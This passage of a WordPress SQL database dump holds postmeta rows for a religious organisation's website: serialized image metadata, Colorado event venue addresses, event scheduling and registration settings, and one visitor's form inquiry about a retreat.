;i:192;s:4:\"file\";s:32:\"2019/10/boy-leaning-watching.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"boy-leaning-watching-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"boy-leaning-watching-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"boy-leaning-watching-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"boy-leaning-watching-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"boy-leaning-watching-250x140.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"boy-leaning-watching-321x180.jpg\";s:5:\"width\";i:321;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"boy-leaning-watching-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27437,198740,'_wp_attached_file','2019/10/daisy-key.jpg'),(27438,198740,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:368;s:6:\"height\";i:206;s:4:\"file\";s:21:\"2019/10/daisy-key.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"daisy-key-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"daisy-key-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:19:\"daisy-key-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:21:\"daisy-key-300x206.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:206;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:21:\"daisy-key-250x140.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:21:\"daisy-key-322x180.jpg\";s:5:\"width\";i:322;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:21:\"daisy-key-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2518,51581,'_wp_attached_file','2019/07/Donation-authorization-form-2016-04-07.pdf'),(30059,216537,'_wp_attached_file','2019/12/Donation-authorization-form-12-2019-ch.pdf'),(30060,216537,'_edit_lock','1576531719:2'),(2533,51767,'_EventShowMapLink','1'),(2534,51767,'_EventShowMap','1'),(2535,51767,'_VenueShowMapLink','1'),(2536,51767,'_VenueShowMap','1'),(2537,51767,'_VenueAddress','900 W. Orman Ave.'),(2538,51767,'_VenueCity','Pueblo'),(2539,51767,'_VenueCountry','United States'),(2540,51767,'_VenueProvince',''),(2541,51767,'_VenueState','CO'),(2542,51767,'_VenueZip',''),(2543,51767,'_VenuePhone',''),(2544,51767,'_VenueURL',''),(2545,51767,'_VenueStateProvince','CO'),(2546,51767,'_VenueOverwriteCoords','0'),(2547,51767,'_VenueGeoAddress','900 W. Orman Ave. Pueblo CO United States'),(2548,51767,'boldgrid_hide_page_title','1'),(2549,51883,'_VenueOrigin','events-calendar'),(2550,51883,'_tribe_modified_fields','a:20:{s:12:\"_VenueOrigin\";d:1563808066;s:10:\"_edit_last\";d:1563808115;s:10:\"post_title\";d:1563808115;s:11:\"post_status\";d:1563808115;s:17:\"_EventShowMapLink\";d:1563808115;s:13:\"_EventShowMap\";d:1563808115;s:17:\"_VenueShowMapLink\";d:1563808115;s:13:\"_VenueShowMap\";d:1563808115;s:13:\"_VenueAddress\";d:1563808115;s:10:\"_VenueCity\";d:1563808115;s:13:\"_VenueCountry\";d:1563808115;s:14:\"_VenueProvince\";d:1563808115;s:11:\"_VenueState\";d:1563808115;s:9:\"_VenueZip\";d:1563808115;s:11:\"_VenuePhone\";d:1563808115;s:9:\"_VenueURL\";d:1563808115;s:19:\"_VenueStateProvince\";d:1563808115;s:21:\"_VenueOverwriteCoords\";d:1563808115;s:16:\"_VenueGeoAddress\";d:1563808115;s:24:\"boldgrid_hide_page_title\";d:1563808115;}'),(2551,51883,'_edit_lock','1616607485:2'),(2552,51883,'_edit_last','1'),(2553,51883,'_EventShowMapLink','1'),(2554,51883,'_EventShowMap','1'),(2555,51883,'_VenueShowMapLink','1'),(2556,51883,'_VenueShowMap','1'),(2557,51883,'_VenueAddress','1135 North Lincoln Avenue, Unit 5'),(2558,51883,'_VenueCity','Loveland'),(2559,51883,'_VenueCountry','United States'),(2560,51883,'_VenueProvince',''),(2561,51883,'_VenueState','CO'),(2562,51883,'_VenueZip','80537'),(2563,51883,'_VenuePhone','970-663-5302'),(2564,51883,'_VenueURL',''),(2565,51883,'_VenueStateProvince','CO'),(2566,51883,'_VenueOverwriteCoords','0'),(2567,51883,'_VenueGeoAddress','1135 North Lincoln Avenue, Unit 5 Loveland CO 80537 United States'),(2568,51883,'boldgrid_hide_page_title','1'),(2569,51976,'_VenueOrigin','events-calendar'),(2570,51976,'_tribe_modified_fields','a:20:{s:12:\"_VenueOrigin\";d:1563808131;s:10:\"_edit_last\";d:1563808146;s:10:\"post_title\";d:1563808146;s:11:\"post_status\";d:1563808188;s:17:\"_EventShowMapLink\";d:1563808188;s:13:\"_EventShowMap\";d:1563808188;s:17:\"_VenueShowMapLink\";d:1563808188;s:13:\"_VenueShowMap\";d:1563808188;s:13:\"_VenueAddress\";d:1563808188;s:10:\"_VenueCity\";d:1563808188;s:13:\"_VenueCountry\";d:1563808188;s:14:\"_VenueProvince\";d:1563808188;s:11:\"_VenueState\";d:1563808188;s:9:\"_VenueZip\";d:1563808188;s:11:\"_VenuePhone\";d:1563808188;s:9:\"_VenueURL\";d:1563808188;s:19:\"_VenueStateProvince\";d:1563808188;s:21:\"_VenueOverwriteCoords\";d:1563808188;s:16:\"_VenueGeoAddress\";d:1563808188;s:24:\"boldgrid_hide_page_title\";d:1563808188;}'),(2571,51976,'_edit_lock','1616607413:2'),(2572,51976,'_edit_last','1'),(2573,51976,'_EventShowMapLink','1'),(2574,51976,'_EventShowMap','1'),(2575,51976,'_VenueShowMapLink','1'),(2576,51976,'_VenueShowMap','1'),(2577,51976,'_VenueAddress','7100 W. Mississippi Avenue'),(2578,51976,'_VenueCity','Lakewood'),(2579,51976,'_VenueCountry','United States'),(2580,51976,'_VenueProvince',''),(2581,51976,'_VenueState','CO'),(2582,51976,'_VenueZip','80226'),(2583,51976,'_VenuePhone','303-756-9287'),(2584,51976,'_VenueURL',''),(2585,51976,'_VenueStateProvince','CO'),(2586,51976,'_VenueOverwriteCoords','0'),(2587,51976,'_VenueGeoAddress','7100 W. Mississippi Avenue Lakewood CO 80226 United States'),(2588,51976,'boldgrid_hide_page_title','1'),(2589,52069,'_VenueOrigin','events-calendar'),(2590,52069,'_tribe_modified_fields','a:20:{s:12:\"_VenueOrigin\";d:1563808206;s:10:\"_edit_last\";d:1563808271;s:10:\"post_title\";d:1563808271;s:11:\"post_status\";d:1563808271;s:17:\"_EventShowMapLink\";d:1563808271;s:13:\"_EventShowMap\";d:1563808271;s:17:\"_VenueShowMapLink\";d:1563808271;s:13:\"_VenueShowMap\";d:1563808271;s:13:\"_VenueAddress\";d:1563808271;s:10:\"_VenueCity\";d:1563808271;s:13:\"_VenueCountry\";d:1563808271;s:14:\"_VenueProvince\";d:1563808271;s:11:\"_VenueState\";d:1563808271;s:9:\"_VenueZip\";d:1563808271;s:11:\"_VenuePhone\";d:1563808271;s:9:\"_VenueURL\";d:1563808271;s:19:\"_VenueStateProvince\";d:1563808271;s:21:\"_VenueOverwriteCoords\";d:1563808271;s:16:\"_VenueGeoAddress\";d:1563808271;s:24:\"boldgrid_hide_page_title\";d:1563808271;}'),(2591,52069,'_edit_lock','1616607355:2'),(2592,52069,'_edit_last','1'),(2593,52069,'_EventShowMapLink','1'),(2594,52069,'_EventShowMap','1'),(2595,52069,'_VenueShowMapLink','1'),(2596,52069,'_VenueShowMap','1'),(2597,52069,'_VenueAddress','5245 Centennial Blvd., Suite 100'),(2598,52069,'_VenueCity','Colorado Springs'),(2599,52069,'_VenueCountry','United States'),(2600,52069,'_VenueProvince',''),(2601,52069,'_VenueState','CO'),(2602,52069,'_VenueZip','80919'),(2603,52069,'_VenuePhone','719-633-0453'),(2604,52069,'_VenueURL',''),(2605,52069,'_VenueStateProvince','CO'),(2606,52069,'_VenueOverwriteCoords','0'),(2607,52069,'_VenueGeoAddress','5245 Centennial Blvd., Suite 100 Colorado Springs CO 80919 United States'),(2608,52069,'boldgrid_hide_page_title','0'),(2609,52162,'_VenueOrigin','events-calendar'),(2610,52162,'_tribe_modified_fields','a:20:{s:12:\"_VenueOrigin\";d:1563808289;s:10:\"_edit_last\";d:1563808323;s:10:\"post_title\";d:1563808323;s:11:\"post_status\";d:1563808323;s:17:\"_EventShowMapLink\";d:1563808323;s:13:\"_EventShowMap\";d:1563808323;s:17:\"_VenueShowMapLink\";d:1563808323;s:13:\"_VenueShowMap\";d:1563808323;s:13:\"_VenueAddress\";d:1563808323;s:10:\"_VenueCity\";d:1563808323;s:13:\"_VenueCountry\";d:1563808323;s:14:\"_VenueProvince\";d:1563808323;s:11:\"_VenueState\";d:1563808323;s:9:\"_VenueZip\";d:1563808323;s:11:\"_VenuePhone\";d:1563808323;s:9:\"_VenueURL\";d:1563808323;s:19:\"_VenueStateProvince\";d:1563808323;s:21:\"_VenueOverwriteCoords\";d:1563808323;s:16:\"_VenueGeoAddress\";d:1563808323;s:24:\"boldgrid_hide_page_title\";d:1563808323;}'),(2611,52162,'_edit_lock','1616607476:2'),(2612,52162,'_edit_last','1'),(2613,52162,'_EventShowMapLink','1'),(2614,52162,'_EventShowMap','1'),(2615,52162,'_VenueShowMapLink','1'),(2616,52162,'_VenueShowMap','1'),(2617,52162,'_VenueAddress','740 W. 15th St.'),(2618,52162,'_VenueCity','Pueblo'),(2619,52162,'_VenueCountry','United States'),(2620,52162,'_VenueProvince',''),(2621,52162,'_VenueState','CO'),(2622,52162,'_VenueZip','81003'),(2623,52162,'_VenuePhone',''),(2624,52162,'_VenueURL',''),(2625,52162,'_VenueStateProvince','CO'),(2626,52162,'_VenueOverwriteCoords','0'),(2627,52162,'_VenueGeoAddress','740 W. 15th St. Pueblo CO 81003 United States'),(2628,52162,'boldgrid_hide_page_title','1'),(2629,52324,'_EventOrigin','events-calendar'),(2630,52324,'_tribe_modified_fields','a:32:{s:12:\"_EventOrigin\";d:1563808512;s:10:\"_edit_last\";d:1563814172;s:10:\"post_title\";d:1563808544;s:12:\"post_content\";i:1577649279;s:11:\"post_status\";d:1563809408;s:13:\"_thumbnail_id\";d:1565525294;s:24:\"boldgrid_hide_page_title\";d:1563809408;s:16:\"_EventRecurrence\";i:1606922209;s:17:\"_EventShowMapLink\";d:1563809408;s:13:\"_EventShowMap\";d:1563809408;s:13:\"_EventVenueID\";d:1563809408;s:15:\"_EventStartDate\";d:1563809408;s:13:\"_EventEndDate\";d:1563809408;s:18:\"_EventStartDateUTC\";d:1563809408;s:16:\"_EventEndDateUTC\";d:1563809408;s:14:\"_EventDuration\";d:1563809408;s:20:\"_EventCurrencySymbol\";d:1563809408;s:22:\"_EventCurrencyPosition\";d:1563809408;s:10:\"_EventCost\";d:1563809408;s:9:\"_EventURL\";d:1563809408;s:14:\"_EventTimezone\";d:1563809408;s:18:\"_EventTimezoneAbbr\";d:1563809408;s:27:\"_EventNextPendingRecurrence\";i:1605363612;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1606922220;s:16:\"tribe_events_cat\";i:1606947408;s:16:\"protect_children\";i:1577649279;s:26:\"_RTECregistrationsDisabled\";i:1606922209;s:17:\"_RTECdeadlineType\";i:1606922209;s:19:\"_RTECwhoCanRegister\";i:1606922209;s:23:\"_RTEClimitRegistrations\";i:1606922209;s:21:\"_RTECmaxRegistrations\";i:1606922209;s:22:\"_EventHideFromUpcoming\";i:1606922209;}'),(2631,52324,'_edit_lock','1606947432:2'),(2632,52324,'_edit_last','2'),(104670,262482,'_form_id','17'),(104671,262482,'_seq_num','3'),(116798,262873,'_EventEndDateUTC','2021-03-07 19:45:00'),(2636,52324,'boldgrid_hide_page_title','1'),(2650,52324,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(103127,52324,'_EventHideFromUpcoming','yes'),(103140,131315,'_RTECregistrationsDisabled','1'),(103141,131315,'_RTECdeadlineType','start'),(103142,131315,'_RTECwhoCanRegister','any'),(103143,131315,'_RTEClimitRegistrations','0'),(103144,131315,'_RTECmaxRegistrations','30'),(103145,131315,'_EventHideFromUpcoming','yes'),(2651,52324,'_EventShowMapLink','1'),(2652,52324,'_EventShowMap','1'),(2653,52324,'_EventVenueID','51976'),(2654,52324,'_EventStartDate','2019-08-11 10:30:00'),(2655,52324,'_EventEndDate','2019-08-11 11:30:00'),(2656,52324,'_EventStartDateUTC','2019-08-11 16:30:00'),(2657,52324,'_EventEndDateUTC','2019-08-11 17:30:00'),(2658,52324,'_EventDuration','3600'),(2659,52324,'_EventCurrencySymbol',''),(2660,52324,'_EventCurrencyPosition','prefix'),(2661,52324,'_EventCost',''),(2662,52324,'_EventURL',''),(2663,52324,'_EventTimezone','America/Denver'),(2664,52324,'_EventTimezoneAbbr','MDT'),(97075,52324,'_EventNextPendingRecurrence','2022-12-11 10:30:00'),(90689,260628,'_field_133','Richard '),(90690,260628,'_field_134','Lafayette '),(90692,260628,'_field_137','HI Retreat '),(90693,260628,'_field_138','Is the HI Retreat at the Colorado Temple still on for May. I’m an HI from LA, can you send me the link to register. '),(90694,260628,'_form_id','13'),(90695,260628,'_seq_num','44'),(118876,262955,'_EventCurrencyPosition','prefix'),(118875,262955,'_EventCurrencySymbol',''),(11343,128132,'boldgrid_hide_page_title','0'),(59555,245088,'_wp_attachment_image_alt','ECK Activities- Three young people smiling'),(64474,249746,'_wp_attachment_image_alt','A series of 6 images showing youth in Eckankar'),(118878,262955,'_EventURL',''),(118879,262955,'_EventTimezone','America/Denver'),(118880,262955,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610269200;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613293200;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1615712400;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618131600;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1620550800;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1623574800;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1625994000;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1628413200;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1631437200;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1633856400;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(121140,263208,'protect_children',''),(120299,263018,'_RTECmaxRegistrations','30'),(120300,263018,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(120301,263018,'_RTECnumRegistered','0'),(120302,263018,'_EventVenueID','262435'),(120304,263018,'_dp_original','263006'),(120305,263018,'_edit_lock','1609540989:2'),(120306,263018,'_edit_last','2'),(120307,263019,'_wp_attached_file','2020/12/kayak-star.jpg'),(120308,263019,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:469;s:6:\"height\";i:264;s:4:\"file\";s:22:\"2020/12/kayak-star.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"kayak-star-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"kayak-star-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"kayak-star-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(121093,263203,'_dp_original','263177'),(121057,263203,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609619822;s:12:\"_EventOrigin\";i:1609619822;s:13:\"_thumbnail_id\";i:1609620137;s:24:\"boldgrid_hide_page_title\";i:1609619822;s:17:\"_EventShowMapLink\";i:1609619822;s:13:\"_EventShowMap\";i:1609619822;s:15:\"_EventStartDate\";i:1609620137;s:13:\"_EventEndDate\";i:1609620137;s:18:\"_EventStartDateUTC\";i:1609620137;s:16:\"_EventEndDateUTC\";i:1609620137;s:14:\"_EventDuration\";i:1609619822;s:20:\"_EventCurrencySymbol\";i:1609619822;s:22:\"_EventCurrencyPosition\";i:1609619822;s:10:\"_EventCost\";i:1609619822;s:9:\"_EventURL\";i:1609619822;s:14:\"_EventTimezone\";i:1609619822;s:18:\"_EventTimezoneAbbr\";i:1609619822;s:27:\"_EventNextPendingRecurrence\";i:1609619822;s:26:\"_RTECregistrationsDisabled\";i:1609619822;s:17:\"_RTECdeadlineType\";i:1609619822;s:19:\"_RTECwhoCanRegister\";i:1609619822;s:23:\"_RTEClimitRegistrations\";i:1609619822;s:21:\"_RTECmaxRegistrations\";i:1609619822;s:16:\"_EventRecurrence\";i:1609619822;s:18:\"_RTECnumRegistered\";i:1609619822;s:13:\"_EventVenueID\";i:1609619822;s:12:\"_dp_original\";i:1609619822;s:16:\"tribe_events_cat\";i:1609645563;s:10:\"_edit_last\";i:1609619907;s:10:\"post_title\";i:1609619907;s:12:\"post_content\";i:1609620363;s:11:\"post_status\";i:1609620137;}'),(121087,263203,'_RTEClimitRegistrations','0'),(121056,263203,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609619822;s:12:\"_EventOrigin\";i:1609619822;s:13:\"_thumbnail_id\";i:1609620137;s:24:\"boldgrid_hide_page_title\";i:1609619822;s:17:\"_EventShowMapLink\";i:1609619822;s:13:\"_EventShowMap\";i:1609619822;s:15:\"_EventStartDate\";i:1609620137;s:13:\"_EventEndDate\";i:1609620137;s:18:\"_EventStartDateUTC\";i:1609620137;s:16:\"_EventEndDateUTC\";i:1609620137;s:14:\"_EventDuration\";i:1609619822;s:20:\"_EventCurrencySymbol\";i:1609619822;s:22:\"_EventCurrencyPosition\";i:1609619822;s:10:\"_EventCost\";i:1609619822;s:9:\"_EventURL\";i:1609619822;s:14:\"_EventTimezone\";i:1609619822;s:18:\"_EventTimezoneAbbr\";i:1609619822;s:27:\"_EventNextPendingRecurrence\";i:1609619822;s:26:\"_RTECregistrationsDisabled\";i:1609619822;s:17:\"_RTECdeadlineType\";i:1609619822;s:19:\"_RTECwhoCanRegister\";i:1609619822;s:23:\"_RTEClimitRegistrations\";i:1609619822;s:21:\"_RTECmaxRegistrations\";i:1609619822;s:16:\"_EventRecurrence\";i:1609619822;s:18:\"_RTECnumRegistered\";i:1609619822;s:13:\"_EventVenueID\";i:1609619822;s:12:\"_dp_original\";i:1609619822;s:16:\"tribe_events_cat\";i:1609645563;s:10:\"_edit_last\";i:1609619907;s:10:\"post_title\";i:1609619907;s:12:\"post_content\";i:1609620363;s:11:\"post_status\";i:1609620137;}'),(121073,263203,'_EventEndDate','2021-01-20 20:00:00'),(121074,263203,'_EventStartDateUTC','2021-01-21 02:00:00'),(121075,263203,'_EventEndDateUTC','2021-01-21 03:00:00'),(121055,263203,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609619822;s:12:\"_EventOrigin\";i:1609619822;s:13:\"_thumbnail_id\";i:1609620137;s:24:\"boldgrid_hide_page_title\";i:1609619822;s:17:\"_EventShowMapLink\";i:1609619822;s:13:\"_EventShowMap\";i:1609619822;s:15:\"_EventStartDate\";i:1609620137;s:13:\"_EventEndDate\";i:1609620137;s:18:\"_EventStartDateUTC\";i:1609620137;s:16:\"_EventEndDateUTC\";i:1609620137;s:14:\"_EventDuration\";i:1609619822;s:20:\"_EventCurrencySymbol\";i:1609619822;s:22:\"_EventCurrencyPosition\";i:1609619822;s:10:\"_EventCost\";i:1609619822;s:9:\"_EventURL\";i:1609619822;s:14:\"_EventTimezone\";i:1609619822;s:18:\"_EventTimezoneAbbr\";i:1609619822;s:27:\"_EventNextPendingRecurrence\";i:1609619822;s:26:\"_RTECregistrationsDisabled\";i:1609619822;s:17:\"_RTECdeadlineType\";i:1609619822;s:19:\"_RTECwhoCanRegister\";i:1609619822;s:23:\"_RTEClimitRegistrations\";i:1609619822;s:21:\"_RTECmaxRegistrations\";i:1609619822;s:16:\"_EventRecurrence\";i:1609619822;s:18:\"_RTECnumRegistered\";i:1609619822;s:13:\"_EventVenueID\";i:1609619822;s:12:\"_dp_original\";i:1609619822;s:16:\"tribe_events_cat\";i:1609645563;s:10:\"_edit_last\";i:1609619907;s:10:\"post_title\";i:1609619907;s:12:\"post_content\";i:1609620363;s:11:\"post_status\";i:1609620137;}'),(121072,263203,'_EventStartDate','2021-01-20 19:00:00'),(120374,263026,'protect_children',''),(120375,263026,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1609084456;s:12:\"_EventOrigin\";i:1609084456;s:24:\"boldgrid_hide_page_title\";i:1609084456;s:17:\"_EventShowMapLink\";i:1609084456;s:13:\"_EventShowMap\";i:1609084456;s:15:\"_EventStartDate\";i:1609085773;s:13:\"_EventEndDate\";i:1609085773;s:18:\"_EventStartDateUTC\";i:1609085773;s:16:\"_EventEndDateUTC\";i:1609085773;s:14:\"_EventDuration\";i:1609084456;s:20:\"_EventCurrencySymbol\";i:1609084456;s:22:\"_EventCurrencyPosition\";i:1609084456;s:10:\"_EventCost\";i:1609084456;s:9:\"_EventURL\";i:1609084456;s:14:\"_EventTimezone\";i:1609084456;s:18:\"_EventTimezoneAbbr\";i:1609084456;s:27:\"_EventNextPendingRecurrence\";i:1609084456;s:12:\"_dp_original\";i:1609084456;s:26:\"_RTECregistrationsDisabled\";i:1609084456;s:17:\"_RTECdeadlineType\";i:1609084456;s:19:\"_RTECwhoCanRegister\";i:1609084456;s:23:\"_RTEClimitRegistrations\";i:1609084456;s:21:\"_RTECmaxRegistrations\";i:1609084456;s:16:\"_EventRecurrence\";i:1609084456;s:18:\"_RTECnumRegistered\";i:1610274605;s:13:\"_EventVenueID\";i:1609084456;s:13:\"_thumbnail_id\";i:1609084456;s:16:\"tribe_events_cat\";i:1609186767;s:10:\"_edit_last\";i:1609085773;s:11:\"post_status\";i:1609085773;s:10:\"post_title\";i:1609085843;}'),(120376,263026,'_EventOrigin','events-calendar'),(120377,263026,'protect_children',''),(120378,263026,'protect_children',''),(120379,263026,'protect_children',''),(120380,263026,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1609084456;s:12:\"_EventOrigin\";i:1609084456;s:24:\"boldgrid_hide_page_title\";i:1609084456;s:17:\"_EventShowMapLink\";i:1609084456;s:13:\"_EventShowMap\";i:1609084456;s:15:\"_EventStartDate\";i:1609085773;s:13:\"_EventEndDate\";i:1609085773;s:18:\"_EventStartDateUTC\";i:1609085773;s:16:\"_EventEndDateUTC\";i:1609085773;s:14:\"_EventDuration\";i:1609084456;s:20:\"_EventCurrencySymbol\";i:1609084456;s:22:\"_EventCurrencyPosition\";i:1609084456;s:10:\"_EventCost\";i:1609084456;s:9:\"_EventURL\";i:1609084456;s:14:\"_EventTimezone\";i:1609084456;s:18:\"_EventTimezoneAbbr\";i:1609084456;s:27:\"_EventNextPendingRecurrence\";i:1609084456;s:12:\"_dp_original\";i:1609084456;s:26:\"_RTECregistrationsDisabled\";i:1609084456;s:17:\"_RTECdeadlineType\";i:1609084456;s:19:\"_RTECwhoCanRegister\";i:1609084456;s:23:\"_RTEClimitRegistrations\";i:1609084456;s:21:\"_RTECmaxRegistrations\";i:1609084456;s:16:\"_EventRecurrence\";i:1609084456;s:18:\"_RTECnumRegistered\";i:1610274605;s:13:\"_EventVenueID\";i:1609084456;s:13:\"_thumbnail_id\";i:1609084456;s:16:\"tribe_events_cat\";i:1609186767;s:10:\"_edit_last\";i:1609085773;s:11:\"post_status\";i:1609085773;s:10:\"post_title\";i:1609085843;}'),(120394,263026,'_EventEndDate','2021-01-10 11:30:00'),(120396,263026,'_EventEndDateUTC','2021-01-10 18:30:00'),(120397,263026,'_EventDuration','3600'),(120381,263026,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1609084456;s:12:\"_EventOrigin\";i:1609084456;s:24:\"boldgrid_hide_page_title\";i:1609084456;s:17:\"_EventShowMapLink\";i:1609084456;s:13:\"_EventShowMap\";i:1609084456;s:15:\"_EventStartDate\";i:1609085773;s:13:\"_EventEndDate\";i:1609085773;s:18:\"_EventStartDateUTC\";i:1609085773;s:16:\"_EventEndDateUTC\";i:1609085773;s:14:\"_EventDuration\";i:1609084456;s:20:\"_EventCurrencySymbol\";i:1609084456;s:22:\"_EventCurrencyPosition\";i:1609084456;s:10:\"_EventCost\";i:1609084456;s:9:\"_EventURL\";i:1609084456;s:14:\"_EventTimezone\";i:1609084456;s:18:\"_EventTimezoneAbbr\";i:1609084456;s:27:\"_EventNextPendingRecurrence\";i:1609084456;s:12:\"_dp_original\";i:1609084456;s:26:\"_RTECregistrationsDisabled\";i:1609084456;s:17:\"_RTECdeadlineType\";i:1609084456;s:19:\"_RTECwhoCanRegister\";i:1609084456;s:23:\"_RTEClimitRegistrations\";i:1609084456;s:21:\"_RTECmaxRegistrations\";i:1609084456;s:16:\"_EventRecurrence\";i:1609084456;s:18:\"_RTECnumRegistered\";i:1610274605;s:13:\"_EventVenueID\";i:1609084456;s:13:\"_thumbnail_id\";i:1609084456;s:16:\"tribe_events_cat\";i:1609186767;s:10:\"_edit_last\";i:1609085773;s:11:\"post_status\";i:1609085773;s:10:\"post_title\";i:1609085843;}'),(120393,263026,'_EventStartDate','2021-01-10 10:30:00'),(120398,263026,'_EventCurrencySymbol',''),(120399,263026,'_EventCurrencyPosition','prefix'),(120382,263026,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1609084456;s:12:\"_EventOrigin\";i:1609084456;s:24:\"boldgrid_hide_page_title\";i:1609084456;s:17:\"_EventShowMapLink\";i:1609084456;s:13:\"_EventShowMap\";i:1609084456;s:15:\"_EventStartDate\";i:1609085773;s:13:\"_EventEndDate\";i:1609085773;s:18:\"_EventStartDateUTC\";i:1609085773;s:16:\"_EventEndDateUTC\";i:1609085773;s:14:\"_EventDuration\";i:1609084456;s:20:\"_EventCurrencySymbol\";i:1609084456;s:22:\"_EventCurrencyPosition\";i:1609084456;s:10:\"_EventCost\";i:1609084456;s:9:\"_EventURL\";i:1609084456;s:14:\"_EventTimezone\";i:1609084456;s:18:\"_EventTimezoneAbbr\";i:1609084456;s:27:\"_EventNextPendingRecurrence\";i:1609084456;s:12:\"_dp_original\";i:1609084456;s:26